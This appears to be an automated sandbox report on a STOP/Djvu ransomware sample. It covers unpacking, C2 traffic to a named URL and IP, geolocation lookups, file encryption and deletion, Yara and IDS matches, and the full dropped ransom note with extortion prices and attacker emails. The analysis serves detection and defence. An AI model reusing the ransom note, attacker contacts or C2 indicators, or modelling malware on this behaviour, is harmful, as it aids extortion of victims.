Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040E870
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	1_2_0040EA51
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	1_2_0040EAA0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	1_2_0040EC68
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	1_2_00410FC0

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 1.2.file.exe.400000.0.unpack
Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 7.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Unpacked PE file: 11.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Unpacked PE file: 12.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	Unpacked PE file: 13.2.file.exe.400000.0.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: file.exe, file.exe, 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: file.exe, 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_00410160
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	1_2_0040F730
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	1_2_0040FB98

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004A7829 GetLogicalDriveStringsW,DeleteVolumeMountPointW,GetCommandLineA,lstrcatW,InterlockedExchange,SetActiveWindow,TryEnterCriticalSection,WriteConsoleW,CopyRect,DebugActiveProcessStop,GetAtomNameW,GlobalDeleteAtom,GetTimeZoneInformation,GetComputerNameW,_memset,GetDefaultCommConfigA,DebugBreak,EnumDateFormatsA,LoadLibraryA,LoadLibraryA,LoadLibraryA,SetCommMask,GetTickCount,GetSystemTimes,FoldStringW,OpenWaitableTimerW,CreateWaitableTimerW,FormatMessageW,__vswprintf,_calloc,_printf,_calloc,_fgetpos,_calloc,LocalAlloc,LoadLibraryA,

0_2_004A7829

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://cajgtus.com/test1/get.php

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 58.151.148.90 58.151.148.90

Source: Joe Sandbox View

ASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_0040CF10

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com

Source: file.exe, 0000000D.00000003.2178146773.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: file.exe, 0000000D.00000003.2178534259.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: file.exe, 0000000D.00000003.2178673504.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: api.2ip.ua
Source: global traffic	DNS traffic detected: DNS query: cajgtus.com

Source: Network traffic	Suricata IDS: 2833438 - Severity 1 - ETPRO MALWARE STOP Ransomware CnC Activity : 192.168.2.4:64820 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2036335 - Severity 1 - ET MALWARE Win32/Filecoder.STOP Variant Public Key Download : 58.151.148.90:80 -> 192.168.2.4:64820

Source: file.exe, 0000000D.00000002.2936387316.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000003.2115984764.00000000008D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php
Source: file.exe, 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
Source: file.exe, 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637Q
Source: file.exe, 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: file.exe, 0000000D.00000003.2177964682.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: file.exe, 0000000D.00000003.2178225867.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: file.exe, 0000000D.00000003.2178296950.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: file.exe, 0000000D.00000003.2178383773.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: file.exe, 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: file.exe, 0000000D.00000003.2178465373.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: file.exe, 0000000D.00000003.2178534259.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: file.exe, 0000000D.00000003.2178603704.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
Source: file.exe, 0000000D.00000003.2178673504.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: file.exe, 00000001.00000002.1765596117.000000000072A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.1894667109.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1993113775.0000000000924000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1993113775.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000003.1992047966.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000003.2065520432.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2066911919.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: file.exe, 0000000B.00000002.1993113775.0000000000924000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000003.1992047966.0000000000923000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/7
Source: file.exe, 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/9
Source: file.exe, 00000007.00000002.1894667109.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/A
Source: file.exe, 00000007.00000002.1894667109.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/EQ
Source: file.exe, 00000001.00000002.1765596117.000000000072A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/X
Source: file.exe, 0000000D.00000002.2936387316.0000000000828000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000003.2115365867.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: file.exe, 0000000C.00000002.2066911919.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json%
Source: file.exe, 00000007.00000002.1894667109.0000000000678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json3
Source: file.exe, 00000007.00000002.1894667109.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json5
Source: file.exe, 0000000B.00000002.1993113775.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonG
Source: file.exe, 00000007.00000002.1894667109.0000000000702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonN
Source: file.exe, 0000000D.00000002.2936387316.0000000000828000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonVh
Source: file.exe, 0000000B.00000003.1992047966.0000000000962000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1993113775.0000000000962000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonZ
Source: file.exe, 0000000D.00000003.2115984764.00000000008C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsondVz
Source: file.exe, 0000000C.00000002.2066911919.0000000000868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsons
Source: file.exe, 0000000B.00000002.1993113775.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsont
Source: file.exe, 0000000B.00000002.1993113775.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsony
Source: file.exe, 0000000D.00000002.2936387316.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936387316.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936387316.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, _readme.txt0.13.dr, _readme.txt.13.dr	String found in binary or memory: https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

1_2_004822E0

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\Users\user\AppData\Local\VirtualStore\_readme.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dPrice of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0874PsawqSSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match

File source: Process Memory Space: file.exe PID: 4904, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.file.exe.22315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.file.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.file.exe.22c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.21a15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.file.exe.22315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.21e15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.file.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.file.exe.22f15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.file.exe.22c15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 7164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 5576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 5644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 3512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 5944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 4904, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File moved: C:\Users\user\Desktop\KATAXZVCPS.jpg	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File deleted: C:\Users\user\Desktop\KATAXZVCPS.jpg	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File moved: C:\Users\user\Desktop\VLZDGUKUTZ.docx	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File deleted: C:\Users\user\Desktop\VLZDGUKUTZ.docx	Jump to behavior
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File moved: C:\Users\user\Desktop\CURQNKVOIX.mp3	Jump to behavior

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File dropped: C:\Users\user\AppData\Local\VirtualStore\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dprice of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address			Jump to dropped file
Source: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe	File dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284dprice of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address			Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.file.exe.22315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.file.exe.22315a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.file.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.file.exe.22f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.file.exe.22c15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.file.exe.22c15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.file.exe.21a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 12.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.file.exe.21a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 12.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.file.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.file.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.file.exe.22315a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.file.exe.22315a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.file.exe.21e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.file.exe.21e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
